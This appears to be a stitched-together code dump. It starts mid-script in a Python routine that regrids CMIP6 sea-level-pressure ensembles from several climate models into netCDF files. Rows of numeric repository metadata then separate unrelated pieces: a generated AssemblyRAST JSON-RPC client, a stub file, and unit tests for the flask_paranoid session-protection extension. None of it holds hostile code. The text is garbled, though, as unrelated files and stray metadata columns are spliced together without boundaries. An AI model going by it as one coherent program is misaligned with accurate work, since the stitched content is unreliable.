forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_hist-GHG_r1i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_hist-GHG_r2i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_hist-GHG_r3i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_CESM2.nc')
#######################
forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_hist-aer_r1i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing=xr.open_mfdataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CESM2_hist-aer_r3i1p1f1_gn_*.nc', concat_dim="time",
data_vars='minimal', coords='minimal', compat='override')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_CESM2.nc')
#%%
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_historical_r1i1p1f2_gr_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_historical_r2i1p1f2_gr_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_historical_r3i1p1f2_gr_185001-201412.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_historical_CNRM-CM6-1.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-GHG_r1i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('//Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-GHG_r4i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-GHG_r5i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_GHGonly_CNRM-CM6-1.nc')
#######################
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-aer_r1i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=output
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-aer_r2i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
forcing = xr.open_dataset('/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/psl_Amon_CNRM-CM6-1_hist-aer_r3i1p1f2_gr_185001-202012.nc')
a=int(forcing.sizes['time']/12)
output=regrid_anomaly(forcing,a)
mylist=xr.concat([mylist,output], 'ens_member')
ens_number=['r1','r2','r3']
mylist=mylist.assign_coords(ens_member=ens_number)
mylist.to_netcdf('/Volumes/Armor_CMIP6/psl_aer_CNRM-CM6-1.nc')
#%%
# FGOALS-g3: a single ensemble member (r1i1p1f1) per experiment, each split
# across several time chunks, hence open_mfdataset with a glob pattern.
# The leftover commented-out ACCESS-ESM1-5 copy-paste was removed and the
# stray '//Volumes' prefix normalised to '/Volumes'.
_src = '/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/'
for experiment, out_file in [
        ('historical', '/Volumes/Armor_CMIP6/psl_historical_FGOALS.nc'),
        ('hist-GHG', '/Volumes/Armor_CMIP6/psl_GHGonly_FGOALS.nc'),
        ('hist-aer', '/Volumes/Armor_CMIP6/psl_aer_FGOALS.nc')]:
    forcing = xr.open_mfdataset(
        _src + 'psl_Amon_FGOALS-g3_%s_r1i1p1f1_gn_*.nc' % experiment,
        concat_dim="time", data_vars='minimal', coords='minimal',
        compat='override')
    output = regrid_anomaly(forcing, int(forcing.sizes['time'] / 12))
    # concat over a one-element list still adds the 'ens_member' dimension.
    mylist = xr.concat([output], 'ens_member')
    mylist = mylist.assign_coords(ens_member=['r1'])
    mylist.to_netcdf(out_file)
#%%
# GFDL-ESM4 ensembles.
# NOTE(review): the historical r2 member points at a single 1850-1949 chunk
# (not a glob) and the hist-piAer run is written to the "GHGonly" output file
# -- both reproduced from the original script; confirm they are intended.
_src = '/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/'
gfdl_runs = [
    (['psl_Amon_GFDL-ESM4_historical_r1i1p1f1_gr1_*.nc',
      'psl_Amon_GFDL-ESM4_historical_r2i1p1f1_gr1_185001-194912.nc'],
     ['r1', 'r2'], '/Volumes/Armor_CMIP6/psl_historical_GFDL-ESM4.nc'),
    (['psl_Amon_GFDL-ESM4_hist-piAer_r1i1p1f1_gr1_*.nc'],
     ['r1'], '/Volumes/Armor_CMIP6/psl_GHGonly_GFDL-ESM4.nc'),
    (['psl_Amon_GFDL-ESM4_hist-aer_r1i1p1f1_gr1_*.nc'],
     ['r1'], '/Volumes/Armor_CMIP6/psl_aer_GFDL-ESM4.nc'),
]
for patterns, labels, out_file in gfdl_runs:
    members = []
    for pattern in patterns:
        forcing = xr.open_mfdataset(
            _src + pattern, concat_dim="time", data_vars='minimal',
            coords='minimal', compat='override')
        members.append(regrid_anomaly(forcing, int(forcing.sizes['time'] / 12)))
    # One concat over the member list matches the old incremental concat.
    mylist = xr.concat(members, 'ens_member').assign_coords(ens_member=labels)
    mylist.to_netcdf(out_file)
#%%
# GISS-E2-1-G: four members per experiment. The source members use mixed
# variant labels but are relabelled r1..r4 in the output, as in the original.
_src = '/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/'
giss_runs = [
    ('historical', ['r2i1p1f1', 'r4i1p1f1', 'r5i1p3f1', 'r6i1p1f2'],
     '/Volumes/Armor_CMIP6/psl_historical_GISS-E2-1-G.nc'),
    ('hist-GHG', ['r1i1p1f2', 'r2i1p1f2', 'r3i1p1f2', 'r4i1p1f2'],
     '/Volumes/Armor_CMIP6/psl_GHGonly_GISS-E2-1-G.nc'),
    ('hist-aer', ['r2i1p1f1', 'r3i1p3f1', 'r4i1p1f1', 'r5i1p3f1'],
     '/Volumes/Armor_CMIP6/psl_aer_GISS-E2-1-G.nc'),
]
for experiment, variants, out_file in giss_runs:
    members = []
    for variant in variants:
        forcing = xr.open_mfdataset(
            _src + 'psl_Amon_GISS-E2-1-G_%s_%s_gn_*.nc' % (experiment, variant),
            concat_dim="time", data_vars='minimal', coords='minimal',
            compat='override')
        members.append(regrid_anomaly(forcing, int(forcing.sizes['time'] / 12)))
    mylist = xr.concat(members, 'ens_member')
    mylist = mylist.assign_coords(ens_member=['r1', 'r2', 'r3', 'r4'])
    mylist.to_netcdf(out_file)
#######################
#%%
# HadGEM3-GC31-LL: two members per experiment (mixed variant labels,
# relabelled r1/r2 on output, as in the original script).
_src = '/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/'
hadgem_runs = [
    ('historical', ['r2i1p1f3', 'r3i1p1f3'],
     '/Volumes/Armor_CMIP6/psl_historical_HadGEM3-GC31-LL.nc'),
    ('hist-GHG', ['r1i1p1f3', 'r4i1p1f3'],
     '/Volumes/Armor_CMIP6/psl_GHGonly_HadGEM3-GC31-LL.nc'),
    ('hist-aer', ['r1i1p1f3', 'r4i1p1f3'],
     '/Volumes/Armor_CMIP6/psl_aer_HadGEM3-GC31-LL.nc'),
]
for experiment, variants, out_file in hadgem_runs:
    members = []
    for variant in variants:
        forcing = xr.open_mfdataset(
            _src + 'psl_Amon_HadGEM3-GC31-LL_%s_%s_gn_*.nc'
            % (experiment, variant),
            concat_dim="time", data_vars='minimal', coords='minimal',
            compat='override')
        members.append(regrid_anomaly(forcing, int(forcing.sizes['time'] / 12)))
    mylist = xr.concat(members, 'ens_member')
    mylist = mylist.assign_coords(ens_member=['r1', 'r2'])
    mylist.to_netcdf(out_file)
#######################
#%%
# IPSL-CM6A-LR: three single-file members per experiment. Historical uses
# source members r23/r25/r26 (1850-2014); the forced runs extend to 2020.
# All are relabelled r1..r3 on output, as in the original script; the stray
# '//Volumes' prefix on the hist-aer r4 path was normalised.
_src = '/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/'
ipsl_runs = [
    ('historical', ['r23i1p1f1', 'r25i1p1f1', 'r26i1p1f1'], '185001-201412',
     '/Volumes/Armor_CMIP6/psl_historical_IPSL-CM6A-LR.nc'),
    ('hist-GHG', ['r1i1p1f1', 'r2i1p1f1', 'r3i1p1f1'], '185001-202012',
     '/Volumes/Armor_CMIP6/psl_GHGonly_IPSL-CM6A-LR.nc'),
    ('hist-aer', ['r1i1p1f1', 'r3i1p1f1', 'r4i1p1f1'], '185001-202012',
     '/Volumes/Armor_CMIP6/psl_aer_IPSL-CM6A-LR.nc'),
]
for experiment, variants, span, out_file in ipsl_runs:
    members = []
    for variant in variants:
        forcing = xr.open_dataset(
            _src + 'psl_Amon_IPSL-CM6A-LR_%s_%s_gr_%s.nc'
            % (experiment, variant, span))
        members.append(regrid_anomaly(forcing, int(forcing.sizes['time'] / 12)))
    mylist = xr.concat(members, 'ens_member')
    mylist = mylist.assign_coords(ens_member=['r1', 'r2', 'r3'])
    mylist.to_netcdf(out_file)
#%%
# MIROC6: two members per experiment, each split across time chunks
# (open_mfdataset with a glob). Members relabelled r1/r2 on output.
_src = '/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/'
miroc_runs = [
    ('historical', ['r1i1p1f1', 'r3i1p1f1'],
     '/Volumes/Armor_CMIP6/psl_historical_MIROC6.nc'),
    ('hist-GHG', ['r1i1p1f1', 'r2i1p1f1'],
     '/Volumes/Armor_CMIP6/psl_GHGonly_MIROC6.nc'),
    ('hist-aer', ['r1i1p1f1', 'r2i1p1f1'],
     '/Volumes/Armor_CMIP6/psl_aer_MIROC6.nc'),
]
for experiment, variants, out_file in miroc_runs:
    members = []
    for variant in variants:
        forcing = xr.open_mfdataset(
            _src + 'psl_Amon_MIROC6_%s_%s_gn_*.nc' % (experiment, variant),
            concat_dim="time", data_vars='minimal', coords='minimal',
            compat='override')
        members.append(regrid_anomaly(forcing, int(forcing.sizes['time'] / 12)))
    mylist = xr.concat(members, 'ens_member')
    mylist = mylist.assign_coords(ens_member=['r1', 'r2'])
    mylist.to_netcdf(out_file)
#%%
# MRI-ESM2-0: three single-file members per experiment. In the forced runs
# the r2 member covers 1850-2020 while r1/r3 stop at 2014, so the time span
# is carried per member. The '//Volumes' prefix on hist-GHG r3 was normalised.
_src = '/Volumes/Armor_CMIP6/CMIP6_project/PSL_historical/'
mri_runs = [
    ('historical',
     [('r1i1p1f1', '185001-201412'), ('r2i1p1f1', '185001-201412'),
      ('r3i1p1f1', '185001-201412')],
     '/Volumes/Armor_CMIP6/psl_historical_MRI-ESM2-0.nc'),
    ('hist-GHG',
     [('r1i1p1f1', '185001-201412'), ('r2i1p1f1', '185001-202012'),
      ('r3i1p1f1', '185001-201412')],
     '/Volumes/Armor_CMIP6/psl_GHGonly_MRI-ESM2-0.nc'),
    ('hist-aer',
     [('r1i1p1f1', '185001-201412'), ('r2i1p1f1', '185001-202012'),
      ('r3i1p1f1', '185001-201412')],
     '/Volumes/Armor_CMIP6/psl_aer_MRI-ESM2-0.nc'),
]
for experiment, members_spec, out_file in mri_runs:
    members = []
    for variant, span in members_spec:
        forcing = xr.open_dataset(
            _src + 'psl_Amon_MRI-ESM2-0_%s_%s_gn_%s.nc'
            % (experiment, variant, span))
        members.append(regrid_anomaly(forcing, int(forcing.sizes['time'] / 12)))
    mylist = xr.concat(members, 'ens_member')
    mylist = mylist.assign_coords(ens_member=['r1', 'r2', 'r3'])
    mylist.to_netcdf(out_file)
| 36.323077
| 159
| 0.766382
| 4,961
| 33,054
| 4.80387
| 0.032252
| 0.065962
| 0.093446
| 0.084592
| 0.970334
| 0.967103
| 0.967103
| 0.961438
| 0.961438
| 0.961438
| 0
| 0.060315
| 0.063532
| 33,054
| 909
| 160
| 36.363036
| 0.709601
| 0.056574
| 0
| 0.736138
| 0
| 0
| 0.422175
| 0.353521
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001912
| false
| 0
| 0.011472
| 0
| 0.015296
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
230056ee366a3f4894299516bcfe5cac0df21a85
| 15,067
|
py
|
Python
|
lib/AssemblyRAST/AssemblyRASTClient.py
|
mclark58/ARAST_SDK
|
76a2abd30a6d6fabcf3700d05e8b025a62dfaaad
|
[
"MIT"
] | null | null | null |
lib/AssemblyRAST/AssemblyRASTClient.py
|
mclark58/ARAST_SDK
|
76a2abd30a6d6fabcf3700d05e8b025a62dfaaad
|
[
"MIT"
] | 15
|
2016-10-26T03:32:34.000Z
|
2019-01-30T22:15:08.000Z
|
lib/AssemblyRAST/AssemblyRASTClient.py
|
mclark58/ARAST_SDK
|
76a2abd30a6d6fabcf3700d05e8b025a62dfaaad
|
[
"MIT"
] | 14
|
2016-09-08T19:40:28.000Z
|
2019-05-17T17:01:45.000Z
|
# -*- coding: utf-8 -*-
############################################################
#
# Autogenerated by the KBase type compiler -
# any changes made here will be overwritten
#
############################################################
from __future__ import print_function
# the following is a hack to get the baseclient to import whether we're in a
# package or not. This makes pep8 unhappy hence the annotations.
try:
    # baseclient and this client are in a package
    from .baseclient import BaseClient as _BaseClient  # @UnusedImport
except Exception:
    # Not in a package: fall back to a top-level import. A broad (but not
    # bare) except is kept because the relative-import failure type varies
    # across Python versions; unlike the original bare except, this no
    # longer swallows SystemExit/KeyboardInterrupt.
    from baseclient import BaseClient as _BaseClient  # @Reimport
class AssemblyRAST(object):
    """JSON-RPC client for the AssemblyRAST KBase service.

    Autogenerated by the KBase type compiler -- any manual change here will
    be overwritten on regeneration.

    Every ``run_<assembler>`` method submits an ``AssemblyParams`` mapping:
    ``workspace_name`` (str), ``read_library_names`` / ``read_library_refs``
    (lists of str), ``output_contigset_name`` (str), plus the optional
    ``min_contig_len`` (int, default 200) and assembler-specific
    ``extra_params`` (list of str).  Each returns an ``AssemblyOutput``
    mapping carrying ``report_name`` and ``report_ref``.
    """

    def __init__(
            self, url=None, timeout=30 * 60, user_id=None,
            password=None, token=None, ignore_authrc=False,
            trust_all_ssl_certificates=False,
            auth_svc='https://kbase.us/services/authorization/Sessions/Login'):
        """Bind the client to *url*; all credential arguments are optional."""
        if url is None:
            raise ValueError('A url is required')
        # No pinned release: call_method() then uses the server default.
        self._service_ver = None
        self._client = _BaseClient(
            url, timeout=timeout, user_id=user_id, password=password,
            token=token, ignore_authrc=ignore_authrc,
            trust_all_ssl_certificates=trust_all_ssl_certificates,
            auth_svc=auth_svc)

    def run_kiki(self, params, context=None):
        """Run the kiki assembler; see the class docstring for *params*."""
        return self._client.call_method(
            'AssemblyRAST.run_kiki', [params], self._service_ver, context)

    def run_velvet(self, params, context=None):
        """Run the velvet assembler; see the class docstring for *params*."""
        return self._client.call_method(
            'AssemblyRAST.run_velvet', [params], self._service_ver, context)

    def run_miniasm(self, params, context=None):
        """Run the miniasm assembler; see the class docstring for *params*."""
        return self._client.call_method(
            'AssemblyRAST.run_miniasm', [params], self._service_ver, context)

    def run_spades(self, params, context=None):
        """Run the SPAdes assembler; see the class docstring for *params*."""
        return self._client.call_method(
            'AssemblyRAST.run_spades', [params], self._service_ver, context)

    def run_idba(self, params, context=None):
        """Run the IDBA assembler; see the class docstring for *params*."""
        return self._client.call_method(
            'AssemblyRAST.run_idba', [params], self._service_ver, context)

    def run_megahit(self, params, context=None):
        """Run the MEGAHIT assembler; see the class docstring for *params*."""
        return self._client.call_method(
            'AssemblyRAST.run_megahit', [params], self._service_ver, context)

    def run_ray(self, params, context=None):
        """Run the Ray assembler; see the class docstring for *params*."""
        return self._client.call_method(
            'AssemblyRAST.run_ray', [params], self._service_ver, context)

    def run_masurca(self, params, context=None):
        """Run the MaSuRCA assembler; see the class docstring for *params*."""
        return self._client.call_method(
            'AssemblyRAST.run_masurca', [params], self._service_ver, context)

    def run_a5(self, params, context=None):
        """Run the A5 assembler; see the class docstring for *params*."""
        return self._client.call_method(
            'AssemblyRAST.run_a5', [params], self._service_ver, context)

    def run_a6(self, params, context=None):
        """Run the A6 assembler; see the class docstring for *params*."""
        return self._client.call_method(
            'AssemblyRAST.run_a6', [params], self._service_ver, context)

    def run_arast(self, params, context=None):
        """Run a full AssemblyRAST job.

        :param params: ``ArastParams`` mapping: the ``AssemblyParams`` keys
            described on the class plus the optional ``recipe``,
            ``assembler`` and ``pipeline`` strings selecting how the
            service assembles the reads.
        :returns: ``AssemblyOutput`` mapping with ``report_name`` and
            ``report_ref``.
        """
        return self._client.call_method(
            'AssemblyRAST.run_arast', [params], self._service_ver, context)

    def status(self, context=None):
        """Return the service status structure."""
        return self._client.call_method('AssemblyRAST.status',
                                        [], self._service_ver, context)
| 53.619217
| 79
| 0.662707
| 1,802
| 15,067
| 5.338513
| 0.084906
| 0.065696
| 0.102495
| 0.044595
| 0.897713
| 0.897713
| 0.881913
| 0.847609
| 0.843971
| 0.839189
| 0
| 0.003894
| 0.267074
| 15,067
| 280
| 80
| 53.810714
| 0.867246
| 0.689985
| 0
| 0.333333
| 1
| 0
| 0.10802
| 0.059574
| 0
| 0
| 0
| 0
| 0
| 1
| 0.19697
| false
| 0.030303
| 0.045455
| 0.015152
| 0.439394
| 0.015152
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
88b965176b7d3406fe9f2c44273da8b2d0b23591
| 197
|
py
|
Python
|
fppy/abstract_algebra/category_algebra.py
|
threecifanggen/python-functional-programming
|
bd17281e5f24db826266f509bc54b25362c0d2a1
|
[
"MIT"
] | 3
|
2021-10-05T09:12:36.000Z
|
2021-11-30T07:11:58.000Z
|
fppy/abstract_algebra/category_algebra.py
|
threecifanggen/python-functional-programming
|
bd17281e5f24db826266f509bc54b25362c0d2a1
|
[
"MIT"
] | 14
|
2021-10-11T05:31:15.000Z
|
2021-12-16T12:52:47.000Z
|
fppy/abstract_algebra/category_algebra.py
|
threecifanggen/python-functional-programming
|
bd17281e5f24db826266f509bc54b25362c0d2a1
|
[
"MIT"
] | null | null | null |
'''
Author: huangbaochen<huangbaochenwo@live.com>
Date: 2021-12-12 19:58:25
LastEditTime: 2021-12-12 19:58:25
LastEditors: huangbaochen<huangbaochenwo@live.com>
Description: Abstract algebra related to category theory
No MERCY
'''
| 21.888889
| 50
| 0.781726
| 28
| 197
| 5.5
| 0.607143
| 0.337662
| 0.38961
| 0.428571
| 0.181818
| 0.181818
| 0
| 0
| 0
| 0
| 0
| 0.154696
| 0.081218
| 197
| 8
| 51
| 24.625
| 0.696133
| 0.954315
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
88e8b0862ebbb52963a5959d4a09aeafeab8d74f
| 5,916
|
py
|
Python
|
tests/test_paranoid.py
|
nehaljwani/flask-paranoid
|
ec6205756d55edd1b135249b9bb345871fef0977
|
[
"MIT"
] | 68
|
2017-06-30T06:52:27.000Z
|
2022-03-22T02:39:58.000Z
|
tests/test_paranoid.py
|
nehaljwani/flask-paranoid
|
ec6205756d55edd1b135249b9bb345871fef0977
|
[
"MIT"
] | 8
|
2017-08-02T04:28:36.000Z
|
2022-01-01T12:53:13.000Z
|
tests/test_paranoid.py
|
nehaljwani/flask-paranoid
|
ec6205756d55edd1b135249b9bb345871fef0977
|
[
"MIT"
] | 7
|
2017-08-02T02:33:58.000Z
|
2020-11-19T08:50:00.000Z
|
import sys
import unittest
from flask import Flask
from flask_paranoid import Paranoid
class ParanoidTests(unittest.TestCase):
    """Behavioral tests for flask_paranoid.Paranoid session protection.

    Each test drives a minimal Flask app through the test client with a
    fixed User-Agent, then changes the User-Agent to trigger Paranoid's
    invalid-session handling (401 / redirect / callback).
    """

    def _delete_cookie(self, name):
        """Return the Set-Cookie header value that deletes cookie *name*."""
        return (name + '=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; '
                'Max-Age=0; Path=/')

    def _make_app(self, redirect_view=None, use_init_app=False):
        """Build a Paranoid-protected Flask app with a '/' route.

        :param redirect_view: value assigned to ``paranoid.redirect_view``
            before the routes are registered (None leaves the default).
        :param use_init_app: exercise the two-step ``Paranoid()`` /
            ``init_app(app)`` initialization instead of ``Paranoid(app)``.
        :returns: ``(app, paranoid, client)`` with a cookie-enabled client.
        """
        app = Flask(__name__)
        app.config['SECRET_KEY'] = 'foo'
        if use_init_app:
            paranoid = Paranoid()
            paranoid.init_app(app)
        else:
            paranoid = Paranoid(app)
        if redirect_view is not None:
            paranoid.redirect_view = redirect_view

        @app.route('/')
        def index():
            return 'foobar'

        client = app.test_client(use_cookies=True)
        return app, paranoid, client

    def _assert_session_cleared(self, rv, expect_remember_token=False):
        """Assert the session cookie was deleted; optionally remember_token too."""
        self.assertIn(self._delete_cookie('session'),
                      rv.headers.getlist('Set-Cookie'))
        if expect_remember_token:
            self.assertIn(self._delete_cookie('remember_token'),
                          rv.headers.getlist('Set-Cookie'))
        else:
            self.assertNotIn(self._delete_cookie('remember_token'),
                             rv.headers.getlist('Set-Cookie'))

    def test_401(self):
        app, paranoid, client = self._make_app()
        rv = client.get('/', headers={'User-Agent': 'foo'})
        self.assertEqual(rv.status_code, 200)
        rv = client.get('/', headers={'User-Agent': 'foo'})
        self.assertEqual(rv.status_code, 200)
        # A changed User-Agent invalidates the session token -> 401.
        rv = client.get('/', headers={'User-Agent': 'bar'})
        self.assertEqual(rv.status_code, 401)
        self._assert_session_cleared(rv)

    def test_redirect_no_domain(self):
        app, paranoid, client = self._make_app(redirect_view='/foobarbaz')
        self.assertEqual(paranoid.redirect_view, '/foobarbaz')
        rv = client.get('/', headers={'User-Agent': 'foo'})
        self.assertEqual(rv.status_code, 200)
        rv = client.get('/', headers={'User-Agent': 'bar'})
        self.assertEqual(rv.status_code, 302)
        self.assertEqual(rv.headers['Location'], 'http://localhost/foobarbaz')
        self._assert_session_cleared(rv)

    def test_redirect_domain(self):
        app, paranoid, client = self._make_app(
            redirect_view='https://foo.com/foobarbaz')
        self.assertEqual(paranoid.redirect_view, 'https://foo.com/foobarbaz')
        rv = client.get('/', headers={'User-Agent': 'foo'})
        self.assertEqual(rv.status_code, 200)
        rv = client.get('/', headers={'User-Agent': 'bar'})
        self.assertEqual(rv.status_code, 302)
        self.assertEqual(rv.headers['Location'], 'https://foo.com/foobarbaz')
        self._assert_session_cleared(rv)

    def test_redirect_view(self):
        app, paranoid, client = self._make_app(redirect_view='custom_redirect')

        @app.route('/redirect')
        def custom_redirect():
            return 'foo'

        self.assertEqual(paranoid.redirect_view, 'custom_redirect')
        rv = client.get('/', headers={'User-Agent': 'foo'})
        self.assertEqual(rv.status_code, 200)
        rv = client.get('/', headers={'User-Agent': 'bar'})
        self.assertEqual(rv.status_code, 302)
        self.assertEqual(rv.headers['Location'], 'http://localhost/redirect')
        self._assert_session_cleared(rv)

    def test_callback(self):
        app, paranoid, client = self._make_app(redirect_view='custom_redirect',
                                               use_init_app=True)

        @paranoid.on_invalid_session
        def custom_callback():
            return 'foo'

        # on_invalid_session replaces the configured redirect view with
        # the callback itself.
        self.assertEqual(paranoid.redirect_view, custom_callback)
        rv = client.get('/', headers={'User-Agent': 'foo'})
        self.assertEqual(rv.status_code, 200)
        rv = client.get('/', headers={'User-Agent': 'bar'})
        self.assertEqual(rv.status_code, 200)
        self.assertEqual(rv.get_data(as_text=True), 'foo')
        self._assert_session_cleared(rv)

    def test_flask_login(self):
        app, paranoid, client = self._make_app(
            redirect_view='https://foo.com/foobarbaz')
        # Fake the presence of flask_login so Paranoid also clears its
        # remember_token cookie; try/finally guarantees the fake module is
        # removed even if an assertion fails mid-test.
        sys.modules['flask_login'] = 'foo'
        try:
            self.assertEqual(paranoid.redirect_view,
                             'https://foo.com/foobarbaz')
            rv = client.get('/', headers={'User-Agent': 'foo'})
            self.assertEqual(rv.status_code, 200)
            rv = client.get('/', headers={'User-Agent': 'bar'})
        finally:
            del sys.modules['flask_login']
        self.assertEqual(rv.status_code, 302)
        self.assertEqual(rv.headers['Location'], 'https://foo.com/foobarbaz')
        self._assert_session_cleared(rv, expect_remember_token=True)
| 34.395349
| 78
| 0.588573
| 655
| 5,916
| 5.129771
| 0.120611
| 0.102679
| 0.091071
| 0.069643
| 0.878571
| 0.87381
| 0.872917
| 0.872917
| 0.872917
| 0.872917
| 0
| 0.012574
| 0.260649
| 5,916
| 171
| 79
| 34.596491
| 0.755601
| 0
| 0
| 0.753846
| 0
| 0
| 0.160243
| 0
| 0
| 0
| 0
| 0
| 0.269231
| 1
| 0.115385
| false
| 0
| 0.030769
| 0.069231
| 0.223077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0012575d9bbe988f5351e20be5536fe0832776eb
| 207
|
py
|
Python
|
trainer/__init__.py
|
weigq/UDA-1
|
4f97980980cafd0a2d02a77211ac7dbaf3e331f6
|
[
"MIT"
] | 32
|
2021-11-08T15:45:30.000Z
|
2022-03-30T09:08:57.000Z
|
trainer/__init__.py
|
weigq/UDA-1
|
4f97980980cafd0a2d02a77211ac7dbaf3e331f6
|
[
"MIT"
] | 3
|
2021-11-16T02:38:51.000Z
|
2022-02-21T13:29:58.000Z
|
trainer/__init__.py
|
weigq/UDA-1
|
4f97980980cafd0a2d02a77211ac7dbaf3e331f6
|
[
"MIT"
] | 4
|
2021-11-09T02:53:18.000Z
|
2021-12-21T22:11:35.000Z
|
# --------------------------------------------------------
# Copyright (c) 2021 Microsoft
# Licensed under The MIT License
# --------------------------------------------------------
from .da import *
| 29.571429
| 59
| 0.294686
| 12
| 207
| 5.083333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022099
| 0.125604
| 207
| 6
| 60
| 34.5
| 0.314917
| 0.835749
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0053dee75a18d059d69cf70dba94554a9fae7013
| 22,593
|
py
|
Python
|
MvLapKSRC_HSIC-master/construct_features.py
|
guofei-tju/MvLapKSRC_HSIC
|
dc9e6d54b834cee5ef9a088f71eb506307672902
|
[
"MIT"
] | null | null | null |
